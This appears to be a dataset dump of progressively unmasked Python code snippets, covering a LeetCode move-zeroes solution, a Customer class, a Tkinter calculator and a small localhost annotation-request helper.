"step-3": "<mask token>\n\n\nclass Solution(object):\n\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j:\n if nums[i] == 0 and nums[j] != 0:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0:\n i += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n\n<mask token>\nprint(s.moveZeroes(nums))\n",
"step-4": "<mask token>\n\n\nclass Solution(object):\n\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j:\n if nums[i] == 0 and nums[j] != 0:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0:\n i += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n\nnums = [-959151711, 623836953, 209446690, -1950418142, 1339915067, -\n 733626417, 481171539, -2125997010, -1225423476, 1462109565, 147434687, \n -1800073781, -1431212205, -450443973, 50097298, 753533734, -747189404, \n -2070885638, 0, -1484353894, -340296594, -2133744570, 619639811, -\n 1626162038, 669689561, 0, 112220218, 502447212, -787793179, 0, -\n 726846372, -1611013491, 204107194, 1605165582, -566891128, 2082852116, \n 0, 532995238, -1502590712, 0, 2136989777, -2031153343, 371398938, -\n 1907397429, 342796391, 609166045, -2007448660, -1096076344, -323570318,\n 0, -2082980371, 2129956379, -243553361, -1549960929, 1502383415, 0, -\n 1394618779, 694799815, 78595689, -1439173023, -1416578800, 685225786, -\n 333502212, -1181308536, -380569313, 772035354, 0, -915266376, 663709718,\n 1443496021, -777017729, -883300731, -387828385, 1907473488, -725483724,\n -972961871, -1255712537, 383120918, 1383877998, 1722751914, 0, -\n 1156050682, 1952527902, -560244497, 1304305692, 1173974542, -1313227247,\n -201476579, -298899493, -1828496581, -1724396350, 1933643204, \n 1531804925, 1728655262, -955565449, 0, -69843702, -461760848, 268336768,\n 1446130876]\ns = Solution()\nprint(s.moveZeroes(nums))\n",
"step-5": "\"\"\"\nMAIN IDEA --> Keep 2 pointers. i points to current 0 element and j searches for first non zero element which comes after i.\nAs soon as we get a j, we swap i and j. So index i now becomes non zero. Now move i to next index i.e i+1 and now check if i \nis zero or non zero. If i is still zero, then again search for 1st non zero element represented by j and swap again.\nIf i is now non-zero then no need to swap we already have a non zero in the beginning of array, so we just move the pointer i forward\n\"\"\"\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j: # j searches for the 1st non zero element after pointer i\n if nums[i] == 0 and nums[j] != 0: # If element at i is zero and j != 0, swap them\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0: # If i is not zero, then just increment both i and j\n i += 1\n #j += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n \nnums = 
[-959151711,623836953,209446690,-1950418142,1339915067,-733626417,481171539,-2125997010,-1225423476,1462109565,147434687,-1800073781,-1431212205,-450443973,50097298,753533734,-747189404,-2070885638,0,-1484353894,-340296594,-2133744570,619639811,-1626162038,669689561,0,112220218,502447212,-787793179,0,-726846372,-1611013491,204107194,1605165582,-566891128,2082852116,0,532995238,-1502590712,0,2136989777,-2031153343,371398938,-1907397429,342796391,609166045,-2007448660,-1096076344,-323570318,0,-2082980371,2129956379,-243553361,-1549960929,1502383415,0,-1394618779,694799815,78595689,-1439173023,-1416578800,685225786,-333502212,-1181308536,-380569313,772035354,0,-915266376,663709718,1443496021,-777017729,-883300731,-387828385,1907473488,-725483724,-972961871,-1255712537,383120918,1383877998,1722751914,0,-1156050682,1952527902,-560244497,1304305692,1173974542,-1313227247,-201476579,-298899493,-1828496581,-1724396350,1933643204,1531804925,1728655262,-955565449,0,-69843702,-461760848,268336768,1446130876]\ns = Solution()\nprint(s.moveZeroes(nums))\n ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from dataclasses import dataclass
from models.user import User
class Customer(User):
def __init__(self, first_name: str, last_name: str, user_name: str, email: str, password: str):
super(Customer, self).__init__(first_name, last_name, user_name, email, password)
# def __str__(self):
# return f"'Firstname' : {self.get__first_name},"
|
normal
|
{
"blob_id": "254f34c923d49374e09b579c5bc1b17b8c69c0e4",
"index": 2661,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Customer(User):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Customer(User):\n\n def __init__(self, first_name: str, last_name: str, user_name: str,\n email: str, password: str):\n super(Customer, self).__init__(first_name, last_name, user_name,\n email, password)\n",
"step-4": "from dataclasses import dataclass\nfrom models.user import User\n\n\nclass Customer(User):\n\n def __init__(self, first_name: str, last_name: str, user_name: str,\n email: str, password: str):\n super(Customer, self).__init__(first_name, last_name, user_name,\n email, password)\n",
"step-5": "from dataclasses import dataclass\n\nfrom models.user import User\n\n\nclass Customer(User):\n def __init__(self, first_name: str, last_name: str, user_name: str, email: str, password: str):\n super(Customer, self).__init__(first_name, last_name, user_name, email, password)\n\n # def __str__(self):\n # return f\"'Firstname' : {self.get__first_name},\"\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import utilities
import sys
if __name__ == "__main__":
print('I am main!')
else:
print(__name__)
for i in range(0,6):
print(i)
mylist = [12, 13, 14, 13, 12]
print(mylist)
#Enter iterations to run [0-5]
#value = -1
value = 3
while (value not in range(0,6)):
try:
value = int(input('Enter #test runs [0-5]:'))
except ValueError:
print('Invalid value entered, retry')
print('Final value entered {}'.format(value))
dir(sys)
print('done!')
for i in mylist:
utilities.myfct(i, 'hi')
utilities.myfct1(i)
|
normal
|
{
"blob_id": "f218f47acfb078877645de26c64e57f92dbcd953",
"index": 8003,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n print('I am main!')\nelse:\n print(__name__)\nfor i in range(0, 6):\n print(i)\n<mask token>\nprint(mylist)\n<mask token>\nwhile value not in range(0, 6):\n try:\n value = int(input('Enter #test runs [0-5]:'))\n except ValueError:\n print('Invalid value entered, retry')\nprint('Final value entered {}'.format(value))\ndir(sys)\nprint('done!')\nfor i in mylist:\n utilities.myfct(i, 'hi')\n utilities.myfct1(i)\n",
"step-3": "<mask token>\nif __name__ == '__main__':\n print('I am main!')\nelse:\n print(__name__)\nfor i in range(0, 6):\n print(i)\nmylist = [12, 13, 14, 13, 12]\nprint(mylist)\nvalue = 3\nwhile value not in range(0, 6):\n try:\n value = int(input('Enter #test runs [0-5]:'))\n except ValueError:\n print('Invalid value entered, retry')\nprint('Final value entered {}'.format(value))\ndir(sys)\nprint('done!')\nfor i in mylist:\n utilities.myfct(i, 'hi')\n utilities.myfct1(i)\n",
"step-4": "import utilities\nimport sys\nif __name__ == '__main__':\n print('I am main!')\nelse:\n print(__name__)\nfor i in range(0, 6):\n print(i)\nmylist = [12, 13, 14, 13, 12]\nprint(mylist)\nvalue = 3\nwhile value not in range(0, 6):\n try:\n value = int(input('Enter #test runs [0-5]:'))\n except ValueError:\n print('Invalid value entered, retry')\nprint('Final value entered {}'.format(value))\ndir(sys)\nprint('done!')\nfor i in mylist:\n utilities.myfct(i, 'hi')\n utilities.myfct1(i)\n",
"step-5": "import utilities\r\nimport sys\r\n\r\nif __name__ == \"__main__\":\r\n print('I am main!')\r\nelse:\r\n print(__name__)\r\n\r\nfor i in range(0,6):\r\n print(i)\r\n \r\nmylist = [12, 13, 14, 13, 12]\r\nprint(mylist)\r\n\r\n#Enter iterations to run [0-5]\r\n#value = -1\r\nvalue = 3\r\nwhile (value not in range(0,6)):\r\n try:\r\n value = int(input('Enter #test runs [0-5]:'))\r\n except ValueError:\r\n print('Invalid value entered, retry')\r\nprint('Final value entered {}'.format(value))\r\n\r\ndir(sys)\r\nprint('done!')\r\nfor i in mylist:\r\n utilities.myfct(i, 'hi')\r\n utilities.myfct1(i)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global math
<|reserved_special_token_0|>
root.title('Calculator')
<|reserved_special_token_0|>
e.grid(columnspan=3)
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
<|reserved_special_token_0|>
buttonClear.grid(row=1, column=0, columnspan=3)
<|reserved_special_token_0|>
root.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global math
root = Tk()
root.title('Calculator')
e = Entry(root, width=60, borderwidth=5)
e.grid(columnspan=3)
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
buttonClear = Button(root, width=52, height=8, text='Clear', command=
button_clear)
buttonClear.grid(row=1, column=0, columnspan=3)
button7 = Button(root, width=16, height=8, text='7', command=lambda :
button_click(7)).grid(row=3, column=0)
button8 = Button(root, width=16, height=8, text='8', command=lambda :
button_click(8)).grid(row=3, column=1)
button9 = Button(root, width=16, height=8, text='9', command=lambda :
button_click(9)).grid(row=3, column=2)
button4 = Button(root, width=16, height=8, text='4', command=lambda :
button_click(4)).grid(row=4, column=0)
button5 = Button(root, width=16, height=8, text='5', command=lambda :
button_click(5)).grid(row=4, column=1)
button6 = Button(root, width=16, height=8, text='6', command=lambda :
button_click(6)).grid(row=4, column=2)
button1 = Button(root, width=16, height=8, text='1', command=lambda :
button_click(1)).grid(row=5, column=0)
button2 = Button(root, width=16, height=8, text='2', command=lambda :
button_click(2)).grid(row=5, column=1)
button3 = Button(root, width=16, height=8, text='3', command=lambda :
button_click(3)).grid(row=5, column=2)
button0 = Button(root, width=16, height=8, text='0', command=lambda :
button_click(0)).grid(row=6, column=0)
buttonEqual = Button(root, width=34, height=8, text='=', command=button_equal
).grid(row=6, column=1, columnspan=2)
buttonPlus = Button(root, width=16, height=8, text='+', command=button_add
).grid(row=7, column=0)
buttonSubtract = Button(root, width=16, height=8, text='-', command=
button_subtract).grid(row=7, column=1)
buttonMul = Button(root, width=16, height=8, text='*', command=button_multiply
).grid(row=7, column=2)
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
global math
root = Tk()
root.title('Calculator')
e = Entry(root, width=60, borderwidth=5)
e.grid(columnspan=3)
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
buttonClear = Button(root, width=52, height=8, text='Clear', command=
button_clear)
buttonClear.grid(row=1, column=0, columnspan=3)
button7 = Button(root, width=16, height=8, text='7', command=lambda :
button_click(7)).grid(row=3, column=0)
button8 = Button(root, width=16, height=8, text='8', command=lambda :
button_click(8)).grid(row=3, column=1)
button9 = Button(root, width=16, height=8, text='9', command=lambda :
button_click(9)).grid(row=3, column=2)
button4 = Button(root, width=16, height=8, text='4', command=lambda :
button_click(4)).grid(row=4, column=0)
button5 = Button(root, width=16, height=8, text='5', command=lambda :
button_click(5)).grid(row=4, column=1)
button6 = Button(root, width=16, height=8, text='6', command=lambda :
button_click(6)).grid(row=4, column=2)
button1 = Button(root, width=16, height=8, text='1', command=lambda :
button_click(1)).grid(row=5, column=0)
button2 = Button(root, width=16, height=8, text='2', command=lambda :
button_click(2)).grid(row=5, column=1)
button3 = Button(root, width=16, height=8, text='3', command=lambda :
button_click(3)).grid(row=5, column=2)
button0 = Button(root, width=16, height=8, text='0', command=lambda :
button_click(0)).grid(row=6, column=0)
buttonEqual = Button(root, width=34, height=8, text='=', command=button_equal
).grid(row=6, column=1, columnspan=2)
buttonPlus = Button(root, width=16, height=8, text='+', command=button_add
).grid(row=7, column=0)
buttonSubtract = Button(root, width=16, height=8, text='-', command=
button_subtract).grid(row=7, column=1)
buttonMul = Button(root, width=16, height=8, text='*', command=button_multiply
).grid(row=7, column=2)
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
global math
root = Tk()
root.title("Calculator")
e = Entry(root,width=60,borderwidth=5)
e.grid(columnspan=3)
def button_click(number):
#e.delete(0, END)
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = "addition"
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == "addition":
e.insert(0, f_num + int(second_number))
if math == "subtraction":
e.insert(0, f_num - int(second_number))
if math == "multiplication":
e.insert(0, f_num * int(second_number))
if math == "division":
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = "subtraction"
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = "multiplication"
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = "division"
f_num = int(first_number)
e.delete(0, END)
buttonClear = Button(root,width=52,height=8,text="Clear",command=button_clear)
buttonClear.grid(row=1,column=0,columnspan=3)
button7 = Button(root,width=16,height=8,text="7",command=lambda: button_click(7)).grid(row=3,column=0)
button8 = Button(root,width=16,height=8,text="8",command=lambda: button_click(8)).grid(row=3,column=1)
button9 = Button(root,width=16,height=8,text="9",command=lambda: button_click(9)).grid(row=3,column=2)
button4 = Button(root,width=16,height=8,text="4",command=lambda: button_click(4)).grid(row=4,column=0)
button5 = Button(root,width=16,height=8,text="5",command=lambda: button_click(5)).grid(row=4,column=1)
button6 = Button(root,width=16,height=8,text="6",command=lambda: button_click(6)).grid(row=4,column=2)
button1 = Button(root,width=16,height=8,text="1",command=lambda: button_click(1)).grid(row=5,column=0)
button2 = Button(root,width=16,height=8,text="2",command=lambda: button_click(2)).grid(row=5,column=1)
button3 = Button(root,width=16,height=8,text="3",command=lambda: button_click(3)).grid(row=5,column=2)
button0 = Button(root,width=16,height=8,text="0",command=lambda: button_click(0)).grid(row=6,column=0)
buttonEqual = Button(root,width=34,height=8,text="=",command=button_equal).grid(row=6,column=1,columnspan=2)
buttonPlus = Button(root,width=16,height=8,text="+",command=button_add).grid(row=7,column=0)
buttonSubtract = Button(root,width=16,height=8,text="-",command=button_subtract).grid(row=7,column=1)
buttonMul = Button(root,width=16,height=8,text="*",command=button_multiply).grid(row=7,column=2)
root.mainloop()
|
flexible
|
{
"blob_id": "e6320bc1c344c87818a4063616db0c63b7b8be49",
"index": 1294,
"step-1": "<mask token>\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\n<mask token>\n",
"step-2": "<mask token>\nglobal math\n<mask token>\nroot.title('Calculator')\n<mask token>\ne.grid(columnspan=3)\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\n<mask token>\nbuttonClear.grid(row=1, column=0, columnspan=3)\n<mask token>\nroot.mainloop()\n",
"step-3": "<mask token>\nglobal math\nroot = Tk()\nroot.title('Calculator')\ne = Entry(root, width=60, borderwidth=5)\ne.grid(columnspan=3)\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\nbuttonClear = Button(root, width=52, height=8, text='Clear', command=\n button_clear)\nbuttonClear.grid(row=1, column=0, columnspan=3)\nbutton7 = Button(root, width=16, height=8, text='7', command=lambda :\n button_click(7)).grid(row=3, column=0)\nbutton8 = Button(root, width=16, height=8, text='8', command=lambda :\n button_click(8)).grid(row=3, column=1)\nbutton9 = Button(root, width=16, height=8, text='9', command=lambda :\n button_click(9)).grid(row=3, column=2)\nbutton4 = Button(root, width=16, height=8, text='4', command=lambda :\n button_click(4)).grid(row=4, column=0)\nbutton5 = Button(root, width=16, height=8, text='5', command=lambda :\n button_click(5)).grid(row=4, column=1)\nbutton6 = Button(root, width=16, height=8, text='6', 
command=lambda :\n button_click(6)).grid(row=4, column=2)\nbutton1 = Button(root, width=16, height=8, text='1', command=lambda :\n button_click(1)).grid(row=5, column=0)\nbutton2 = Button(root, width=16, height=8, text='2', command=lambda :\n button_click(2)).grid(row=5, column=1)\nbutton3 = Button(root, width=16, height=8, text='3', command=lambda :\n button_click(3)).grid(row=5, column=2)\nbutton0 = Button(root, width=16, height=8, text='0', command=lambda :\n button_click(0)).grid(row=6, column=0)\nbuttonEqual = Button(root, width=34, height=8, text='=', command=button_equal\n ).grid(row=6, column=1, columnspan=2)\nbuttonPlus = Button(root, width=16, height=8, text='+', command=button_add\n ).grid(row=7, column=0)\nbuttonSubtract = Button(root, width=16, height=8, text='-', command=\n button_subtract).grid(row=7, column=1)\nbuttonMul = Button(root, width=16, height=8, text='*', command=button_multiply\n ).grid(row=7, column=2)\nroot.mainloop()\n",
"step-4": "from tkinter import *\nglobal math\nroot = Tk()\nroot.title('Calculator')\ne = Entry(root, width=60, borderwidth=5)\ne.grid(columnspan=3)\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\nbuttonClear = Button(root, width=52, height=8, text='Clear', command=\n button_clear)\nbuttonClear.grid(row=1, column=0, columnspan=3)\nbutton7 = Button(root, width=16, height=8, text='7', command=lambda :\n button_click(7)).grid(row=3, column=0)\nbutton8 = Button(root, width=16, height=8, text='8', command=lambda :\n button_click(8)).grid(row=3, column=1)\nbutton9 = Button(root, width=16, height=8, text='9', command=lambda :\n button_click(9)).grid(row=3, column=2)\nbutton4 = Button(root, width=16, height=8, text='4', command=lambda :\n button_click(4)).grid(row=4, column=0)\nbutton5 = Button(root, width=16, height=8, text='5', command=lambda :\n button_click(5)).grid(row=4, column=1)\nbutton6 = Button(root, width=16, height=8, 
text='6', command=lambda :\n button_click(6)).grid(row=4, column=2)\nbutton1 = Button(root, width=16, height=8, text='1', command=lambda :\n button_click(1)).grid(row=5, column=0)\nbutton2 = Button(root, width=16, height=8, text='2', command=lambda :\n button_click(2)).grid(row=5, column=1)\nbutton3 = Button(root, width=16, height=8, text='3', command=lambda :\n button_click(3)).grid(row=5, column=2)\nbutton0 = Button(root, width=16, height=8, text='0', command=lambda :\n button_click(0)).grid(row=6, column=0)\nbuttonEqual = Button(root, width=34, height=8, text='=', command=button_equal\n ).grid(row=6, column=1, columnspan=2)\nbuttonPlus = Button(root, width=16, height=8, text='+', command=button_add\n ).grid(row=7, column=0)\nbuttonSubtract = Button(root, width=16, height=8, text='-', command=\n button_subtract).grid(row=7, column=1)\nbuttonMul = Button(root, width=16, height=8, text='*', command=button_multiply\n ).grid(row=7, column=2)\nroot.mainloop()\n",
"step-5": "from tkinter import *\r\n\r\nglobal math\r\n\r\nroot = Tk()\r\n\r\nroot.title(\"Calculator\")\r\n\r\ne = Entry(root,width=60,borderwidth=5)\r\ne.grid(columnspan=3)\r\n\r\ndef button_click(number):\r\n\t#e.delete(0, END)\r\n\tcurrent = e.get()\r\n\te.delete(0, END)\r\n\te.insert(0, str(current) + str(number))\r\n\r\ndef button_clear():\r\n\te.delete(0, END)\r\n\r\n\r\ndef button_add():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"addition\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_equal():\r\n\tsecond_number = e.get()\r\n\te.delete(0, END)\r\n\t\r\n\tif math == \"addition\":\r\n\t\te.insert(0, f_num + int(second_number))\r\n\r\n\tif math == \"subtraction\":\r\n\t\te.insert(0, f_num - int(second_number))\r\n\r\n\tif math == \"multiplication\":\r\n\t\te.insert(0, f_num * int(second_number))\r\n\r\n\tif math == \"division\":\r\n\t\te.insert(0, f_num / int(second_number))\r\n\r\ndef button_subtract():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"subtraction\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_multiply():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"multiplication\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_divide():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"division\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\n\r\n\r\nbuttonClear = Button(root,width=52,height=8,text=\"Clear\",command=button_clear)\r\nbuttonClear.grid(row=1,column=0,columnspan=3)\r\n\r\nbutton7 = Button(root,width=16,height=8,text=\"7\",command=lambda: button_click(7)).grid(row=3,column=0)\r\nbutton8 = Button(root,width=16,height=8,text=\"8\",command=lambda: button_click(8)).grid(row=3,column=1)\r\nbutton9 = Button(root,width=16,height=8,text=\"9\",command=lambda: button_click(9)).grid(row=3,column=2)\r\n\r\nbutton4 = 
Button(root,width=16,height=8,text=\"4\",command=lambda: button_click(4)).grid(row=4,column=0)\r\nbutton5 = Button(root,width=16,height=8,text=\"5\",command=lambda: button_click(5)).grid(row=4,column=1)\r\nbutton6 = Button(root,width=16,height=8,text=\"6\",command=lambda: button_click(6)).grid(row=4,column=2)\r\n\r\nbutton1 = Button(root,width=16,height=8,text=\"1\",command=lambda: button_click(1)).grid(row=5,column=0)\r\nbutton2 = Button(root,width=16,height=8,text=\"2\",command=lambda: button_click(2)).grid(row=5,column=1)\r\nbutton3 = Button(root,width=16,height=8,text=\"3\",command=lambda: button_click(3)).grid(row=5,column=2)\r\n\r\n\r\nbutton0 = Button(root,width=16,height=8,text=\"0\",command=lambda: button_click(0)).grid(row=6,column=0)\r\nbuttonEqual = Button(root,width=34,height=8,text=\"=\",command=button_equal).grid(row=6,column=1,columnspan=2)\r\n\r\nbuttonPlus = Button(root,width=16,height=8,text=\"+\",command=button_add).grid(row=7,column=0)\r\nbuttonSubtract = Button(root,width=16,height=8,text=\"-\",command=button_subtract).grid(row=7,column=1)\r\nbuttonMul = Button(root,width=16,height=8,text=\"*\",command=button_multiply).grid(row=7,column=2)\r\n\r\nroot.mainloop()",
"step-ids": [
7,
8,
9,
10,
11
]
}
|
[
7,
8,
9,
10,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequestAnnotation:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequestAnnotation:
def schedule(self, command: str, **kwargs):
response = requests.post(url=
f'http://localhost:{config.annotation_port}/{command}', json=kwargs
)
return json.loads(response.text)
<|reserved_special_token_1|>
import json
import requests
import config
class RequestAnnotation:
def schedule(self, command: str, **kwargs):
response = requests.post(url=
f'http://localhost:{config.annotation_port}/{command}', json=kwargs
)
return json.loads(response.text)
<|reserved_special_token_1|>
import json
import requests
import config
class RequestAnnotation:
def schedule(self,
command: str,
**kwargs):
response = requests.post(url=f"http://localhost:{config.annotation_port}/{command}",
json=kwargs)
# not 'text' for annotating, but 'text' of response is meant here:
return json.loads(response.text)
|
flexible
|
{
"blob_id": "6782761bcbf53ea5076b6dfb7de66d0e68a9f45d",
"index": 3123,
